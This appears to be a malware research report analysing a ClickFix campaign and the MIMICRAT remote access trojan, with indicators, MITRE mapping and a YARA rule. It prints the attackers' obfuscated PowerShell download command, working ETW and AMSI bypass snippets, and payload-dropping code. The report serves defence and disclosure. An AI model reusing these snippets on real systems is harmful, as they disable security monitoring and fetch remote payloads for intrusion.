MIMICRAT: ClickFix Campaign Delivers Custom RAT via Compromised Legitimate Websites

Introduction

During a recent investigation, Elastic Security Labs identified an active ClickFix campaign compromising multiple legitimate websites to deliver a multi-stage malware chain. Unlike simpler ClickFix deployments that terminate at commodity infostealers, this campaign ends with a capable custom remote access trojan (RAT) we have called MIMICRAT: a native C implant with malleable C2 profiles, token impersonation, SOCKS5 tunneling, and a 22-command dispatch table.

The campaign demonstrates a high level of operational sophistication: compromised sites spanning multiple industries and geographies serve as delivery infrastructure, a multi-stage PowerShell chain performs ETW and AMSI bypass before dropping a Lua-scripted shellcode loader, and the final implant communicates over HTTPS on port 443 using HTTP profiles that resemble legitimate web analytics traffic.

Key takeaways

• Multiple legitimate websites were compromised to deliver a five-stage attack chain.
• The Lua loader executes embedded shellcode.
• MIMICRAT is a bespoke native C++ RAT with malleable C2 profiles, Windows token theft, and SOCKS5 proxy.

Discovery

Elastic Security Labs first identified this campaign in early February 2026 through endpoint telemetry flagging suspicious PowerShell execution with obfuscated command-line arguments.

Given the novelty of the final payload, we publicly disclosed initial indicators via social media on February 11, 2026 to ensure the broader security community could begin hunting for and defending against this threat while our full analysis was underway. The campaign remains active as of this publication.

Researchers at Huntress have documented related ClickFix campaigns using similar infrastructure and techniques, indicating the breadth of this threat actor's operations across multiple parallel campaigns.

Campaign Delivery

The campaign's delivery relies entirely on compromising legitimate, trusted websites rather than attacker-owned infrastructure. The entry point for victims is bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service. The threat actor compromised this site and injected a malicious JavaScript snippet that dynamically loads an external script hosted at https://www.investonline[.]in/js/jq.php, a second compromised site, a legitimate Indian mutual fund investment platform (Abchlor Investments Pvt. Ltd.). The external script is named to impersonate the jQuery library, blending into the page's existing resource load.

It is this remotely loaded script (jq.php) that delivers the ClickFix lure: a fake Cloudflare verification page instructing the victim to manually paste and execute a command to "fix" a problem. The lure copies a malicious PowerShell command directly to the victim's clipboard and prompts them to open a Run dialog (Win+R) or PowerShell prompt and paste it. This technique bypasses browser-based download protections entirely, as no file is downloaded.

This multidimensional compromise relies on a victim-facing website loading a malicious script from a second compromised website, distributes detection risk and increases the perceived legitimacy of the lure to both users and automated security tools. The campaign supports 17 languages, with the lure content dynamically localized based on the victim's browser language settings to broaden its effective reach. Identified victims span multiple geographies, including a USA-based university and multiple Chinese-speaking users documented in public forum discussions, suggesting broad opportunistic targeting.

The following is the list of supported languages by the ClickFix:

• English
• Chinese
• Russian
• Spanish
• French
• German
• Portuguese
• Japanese
• Korean
• Italian
• Turkish
• Polish
• Dutch
• Vietnamese
• Arabic
• Hindi
• Indonesian

Code analysis

Once the victim executes the clipboard command, the campaign unfolds across five distinct stages: an obfuscated PowerShell downloader contacts the C2 to retrieve a second-stage script that patches Windows event logging(ETW) and antivirus scanning(AMSI) before dropping a Lua-based loader; the loader decrypts and executes shellcode entirely in memory; and the shellcode ultimately delivers MIMICRAT, a capable RAT designed for persistent access and lateral movement.

Stage 1 Powershell one liner command

The clipboard-delivered command is a compact and obfuscated PowerShell one-liner:

powershell.exe -WInDo Min $RdLU='aZmEwGEtHPckKyBXPxMRi.neTwOrkicsGf';$OnRa=($RdLU.Substring(17,12));$jOFn=.($RdLU[(87)/(3)]+$RdLU[19]+$RdLU[2]) $OnRa;$TNNt=$jOFn; .($TNNt.Remove(0,3).Remove(3))($TNNt); # connects to xMRi.neTwOrk

The command uses string slicing and arithmetic index operations on a single seed string (aZmEwGEtHPckKyBXPxMRi.neTwOrkicsGf) to reconstruct both the target domain and the invocation mechanism at runtime, avoiding any plaintext representation of the C2 domain or PowerShell cmdlet names in the initial payload. The window is minimized (-WInDo Min). The extracted domain is xMRi.neTwOrk, which resolves to 45.13.212.250, and downloads a second-stage PowerShell script.

Infrastructure pivoting on 45.13.212.250 via VirusTotal relations revealed a second domain, WexMrI.CC, resolving to the same IP. Both domains share the same mixed-case formatting obfuscation pattern.

Stage 2 Obfuscated Powershell script

The downloaded second-stage PowerShell script is significantly more elaborated. All strings are constructed at runtime by resolving arithmetic expressions to ASCII characters:

$smaau = (-join[char[]](((7454404997-7439813680)/175799),(91873122/759282),...))
# Resolves to: "System.Diagnostics.Eventing.EventProvider"

This technique renders the script opaque to static analysis and signature-based detection while remaining fully functional at runtime. A dummy class declaration is included as a decoy and
the script executes four sequential operations:

ETW Bypass

The script accesses the internal m_enabled field of the System.Diagnostics.Eventing.EventProvider class via reflection and patches its value to 0, effectively disabling Event Tracing for Windows and blinding PowerShell script block logging.

[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)

AMSI Bypass

The script then uses reflection to access System.Management.Automation.AmsiUtils and sets the amsiInitFailed field to $true, causing PowerShell to skip all AMSI content scanning for the remainder of the session.

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

AMSI - Memory Patching

The script performs runtime method handle patching via Marshal.Copy in an additional but less common defense evasion step overwriting method pointers in memory to redirect execution away from monitored code paths. This targets the function ScanContent under System.Management.Automation.AmsiUtils to an empty generate method.

$ScanContent_func = [Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetMethods("NonPublic,Static") | Where-Object Name -eq "ScanContent"
$tttttttttt       = [zsZRXVIIMQvZ].GetMethods() | Where-Object Name -eq "FHVcGSwOEM"

[System.Runtime.InteropServices.Marshal]::Copy( @([System.Runtime.InteropServices.Marshal]::ReadIntPtr([long]$tttttttttt.MethodHandle.Value + [long]8)),
    0,
    [long]$ScanContent_func.MethodHandle.Value + [long]8,
    1
)

Payload Delivery

With event logging and AV scanning disabled, the script decodes a base64-encoded ZIP archive, extracts it to a randomly named directory under %ProgramData%/knz_{random}, and executes the contained binary zbuild.exe. Temporary artifacts are cleaned up post-execution.

$extractTo = Join-Path $env:ProgramData ("knz_{0}" -f ([IO.Path]::GetRandomFileName()))
[IO.Compression.ZipFile]::ExtractToDirectory($tempZip, $extractTo)
Start-Process (Join-Path $extractTo 'zbuild.exe')

Stage 3 Lua loader

The dropped binary is a custom Lua 5.4.7 loader. It embeds a Lua interpreter statically.
The binary decrypts an embedded Lua script using a XOR stub at runtime, then executes it. The XOR decryption routine (fxh::utility::lua_script_xor_decrypt) iterates over the encrypted buffer XORing each byte against a key.

The Lua script implements a custom Base64 decoder with a non-standard alphabet to decode an embedded shellcode. The decoded shellcode is then allocated in executable memory via luaalloc, copied into that memory with luacpy, and finally executed via luaexe, achieving fully in-memory, fileless shellcode execution.

Stage 4 shellcode

Shellcode matched Meterpreter-related signatures, suggesting the shellcode stage is a loader consistent with the Meterpreter code-family to reflectively load MIMICRAT into memory.

Stage 5 MIMICRAT

The final payload with compilation metadata set to January 29 2026 is a native MSVC x64 PEcompiled with Microsoft Visual Studio linker version 14.44. It does not match any known open-source C2 framework exactly, implementing its own malleable HTTP C2 profiles with ASCII-character-based command dispatch and a custom architecture.

C2 Configuration and communication

MIMICRAT's configuration is stored in the .data section. It contains cryptographic keys, connection parameters, and two complete HTTP communication profiles. All header strings and URIs are hex-encoded ASCII, and decoded at runtime.

The C2 operates over HTTPS on port 443 with a 10-second callback interval. The C2 server hostname (d15mawx0xveem1.cloudfront.net) is RC4 encrypted with the following RC4 key @z1@@9&Yv6GR6vp#SyeG&ZkY0X74%JXLJEv2Ci8&J80AlVRJk&6Cl$Hb)%a8dgqthEa6!jbn70i27d4bLcE33acSoSaSsq6KpRaA7xDypo(5.

The implant uses HTTPS for communication with a layered encryption scheme: an embedded RSA-1024 public key handles asymmetric session key exchange.

While AES is used for symmetric encryption of C2 traffic it uses a hardcoded IV abcdefghijklmnop and a runtime calculated key which derived from a SHA-256 hash value of a randomly generated alpha-numeric value example 9ZQs0p0gfpOj3Y02.

The following are the profile used by the sample for POST and GET requests:

HTTP GET Profile: Check-in and Tasking

HTTP POST Profile: Data Exfiltration

Command Dispatch

MIMICRAT implements a total of 22 distinct commands to provide post-exploitation capabilities like process and file system control, interactive shell access, token manipulation, shellcode injection, and SOCKS proxy tunneling. The beacon interval and jitter are operator-configurable at runtime via dedicated commands. The following is a summarized table of all the implemented commands:

Infrastructure

The campaign's network infrastructure clusters into two primary groups:

Cluster A — Initial Payload Delivery (45.13.212.251 / 45.13.212.250)

Multiple domains point to this IP range, including xMRi.neTwOrk and WexMrI.CC. Domain naming uses mixed-case obfuscation. This infrastructure serves the second-stage PowerShell script and the embedded payload ZIP.

Cluster B Post-Exploitation C2 (23.227.202.114)

Associated with www.ndibstersoft[.]com and observed in beacon communications from the dropped file. This represents the operator's post-exploitation C2 channel.

CloudFront C2 Relay
d15mawx0xveem1.cloudfront[.]net is confirmed as part of MIMICRAT's C2 infrastructure. VT relations for the rgen.zip sample show it contacting this CloudFront domain using the same /intake/organizations/events?channel=app URI pattern identified in MIMICRAT's GET profile, confirming it acts as a C2 relay fronting for the backend server.

Delivery Infrastructure

Two compromised legitimate websites form the delivery chain:

• bincheck.io — victim-facing entry point; compromised to load the external malicious script
• investonline.in — hosts the ClickFix JavaScript payload (/js/jq.php) disguised as jQuery; this script renders the lure and delivers the clipboard PowerShell

Malware and MITRE ATT&CK**

Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.

Tactics

Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.

• Initial Access
• Execution
• Defense Evasion
• Persistence
• Privilege Escalation
• Discovery
• Exfiltration
• Command and Control

Techniques

Techniques represent how an adversary achieves a tactical goal by performing an action.

• Phishing: Spearphishing via Service (ClickFix clipboard)
• User Execution: Malicious Link
• Command and Scripting Interpreter: PowerShell
• Obfuscated Files or Information: Command Obfuscation
• Impair Defenses: Disable or Modify Tools (AMSI bypass)
• Impair Defenses: Disable Windows Event Logging (ETW patch)
• Reflective Code Loading / In-Memory Execution
• Scheduled Task/Job
• Access Token Manipulation: Token Impersonation/Theft
• Process Injection
• Process Discovery
• File and Directory Discovery
• Exfiltration Over C2 Channel
• Application Layer Protocol: Web Protocols (HTTPS)
• Proxy

Mitigations

Detection

The following detection rules and behavior prevention events were observed throughout the analysis of this intrusion set:

• Execution via Obfuscated PowerShell Script
• DNS Query to Suspicious Top Level Domain
• Suspicious Command Shell Execution via Windows Run
• Token theft and impersonation
• Potential Privilege Escalation via Token Impersonation
• Shellcode Execution from Low Reputation Module

YARA

Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the MimicRat:

rule Windows_Trojan_MimicRat {
    meta:
        author = "Elastic Security"
        creation_date = "2026-02-13"
        last_modified = "2026-02-13"
        os = "Windows"
        arch = "x86"
        category_type = "Trojan"
        family = "MimicRat"
        threat_name = "Windows.Trojan.MimicRat"
        reference_sample = "a508d0bb583dc6e5f97b6094f8f910b5b6f2b9d5528c04e4dee62c343fce6f4b"
        scan_type = "File, Memory"
        severity = 100

    strings:
        $b_0 = { 41 8B 56 18 49 8B 4E 10 41 89 46 08 }
        $b_1 = { 41 FF C0 48 FF C1 48 83 C2 4C 49 3B CA }
    condition:
        all of them
}

Observations

All observables are also available for download in both ECS and STIX format in a combined zip bundle.

The following observables were discussed in this research.